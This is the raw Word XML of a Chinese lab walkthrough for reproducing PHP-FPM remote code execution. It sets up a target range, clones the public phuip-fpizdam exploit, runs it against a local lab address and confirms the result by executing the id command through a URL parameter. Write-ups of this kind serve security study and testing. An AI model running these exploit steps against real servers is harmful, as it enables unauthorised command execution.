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1310C8" w:rsidRDefault="008E6D92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001310C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E6D92" w:rsidRDefault="008E6D92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8E6D92" w:rsidRDefault="008E6D9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D92" w:rsidRDefault="008E6D92">
                            <w:r w:rsidRPr="008E6D92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8E6D92" w:rsidRDefault="008E6D92">
                      <w:r w:rsidRPr="008E6D92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6D92" w:rsidRDefault="008E6D92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端口的/</w:t>
      </w:r>
      <w:r>
        <w:t>index.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可查看到一个默认页面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E6D92" w:rsidRDefault="008E6D92">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FABAF26" wp14:editId="1267CBCA">
            <wp:extent cx="16764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92" w:rsidRDefault="008E6D92">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E6D92" w:rsidRPr="001310C8" w:rsidRDefault="008E6D92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001310C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E6D92" w:rsidRDefault="00674DA0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、</w:t>
      </w:r>
      <w:r w:rsidR="00EF51FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装g</w:t>
      </w:r>
      <w:r w:rsidR="00EF51FB">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00EF51FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境之后，更改g</w:t>
      </w:r>
      <w:r w:rsidR="00EF51FB">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00EF51FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>国内镜像源，不然会报错</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF51FB" w:rsidRDefault="00EF51F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87462" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="1333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4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FB" w:rsidRPr="00EF51FB" w:rsidRDefault="00EF51FB" w:rsidP="00EF51FB">
                            <w:r w:rsidRPr="00EF51FB">
                              <w:t>go env -w GOPROXY=https://goproxy.cn</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00EF51FB" w:rsidRDefault="00EF51FB" w:rsidP="00EF51FB">
                            <w:r w:rsidRPr="00EF51FB">
                              <w:t>go get -v &amp;&amp; go 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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00EF51FB" w:rsidRPr="00EF51FB" w:rsidRDefault="00EF51FB" w:rsidP="00EF51FB">
                      <w:r w:rsidRPr="00EF51FB">
                        <w:t>go env -w GOPROXY=https://goproxy.cn</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00EF51FB" w:rsidRDefault="00EF51FB" w:rsidP="00EF51FB">
                      <w:r w:rsidRPr="00EF51FB">
                        <w:t>go get -v &amp;&amp; go build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1FB" w:rsidRDefault="00EF51FB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、使用</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>https://github.com/neex/phuip-fpizdam</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的工具包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF51FB" w:rsidRDefault="00EF51F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164015" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="1778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FB" w:rsidRDefault="00EF51FB">
                            <w:r w:rsidRPr="00EF51FB">
                              <w:t>git clone https://github.com/neex/phuip-fpizdam.git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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00EF51FB" w:rsidRDefault="00EF51FB">
                      <w:r w:rsidRPr="00EF51FB">
                        <w:t>git clone https://github.com/neex/phuip-fpizdam.git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1FB" w:rsidRDefault="00EF51FB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、执行脚本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF51FB" w:rsidRDefault="00EF51FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5163820" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="1778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FB" w:rsidRDefault="00EF51FB">
                            <w:r>
                              <w:t>cd phuip-fpizdam</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00EF51FB" w:rsidRPr="00EF51FB" w:rsidRDefault="00EF51FB">
                            <w:r w:rsidRPr="00EF51FB">
                              <w:t>go run . "http://192.168.125.1:8080/index.php"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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00EF51FB" w:rsidRDefault="00EF51FB">
                      <w:r>
                        <w:t>cd phuip-fpizdam</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00EF51FB" w:rsidRPr="00EF51FB" w:rsidRDefault="00EF51FB">
                      <w:r w:rsidRPr="00EF51FB">
                        <w:t>go run . "http://192.168.125.1:8080/index.php"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1FB" w:rsidRDefault="00EF51FB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4、访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="007C0046">
          <w:rPr>
            <w:rStyle w:val="a7"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>h</w:t>
        </w:r>
        <w:r w:rsidRPr="007C0046">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>ttp://your-ip:8080/index.php?a=id</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，成功执行i</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令并返回结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF51FB" w:rsidRDefault="00864A3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1922405" wp14:editId="6CE22A8C">
            <wp:extent cx="5274310" cy="358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ED5" w:rsidRDefault="00DC7ED5" w:rsidP="008E6D92">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00DC7ED5" w:rsidRDefault="00DC7ED5" w:rsidP="008E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ED5" w:rsidRDefault="00DC7ED5" w:rsidP="008E6D92">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00DC7ED5" w:rsidRDefault="00DC7ED5" w:rsidP="008E6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95"/>
    <w:rsid w:val="001310C8"/>
    <w:rsid w:val="00674DA0"/>
    <w:rsid w:val="00864A3B"/>
    <w:rsid w:val="008B5AE4"/>
    <w:rsid w:val="008E6D92"/>
    <w:rsid w:val="00CB5095"/>
    <w:rsid w:val="00DC7ED5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33CA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2384AD6B-20EA-4DB1-9A5C-D4D4C5D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D92"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EF5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ip:8080/index.php?a=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eex/phuip-fpizd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2022-05-29T07:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-29T13:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>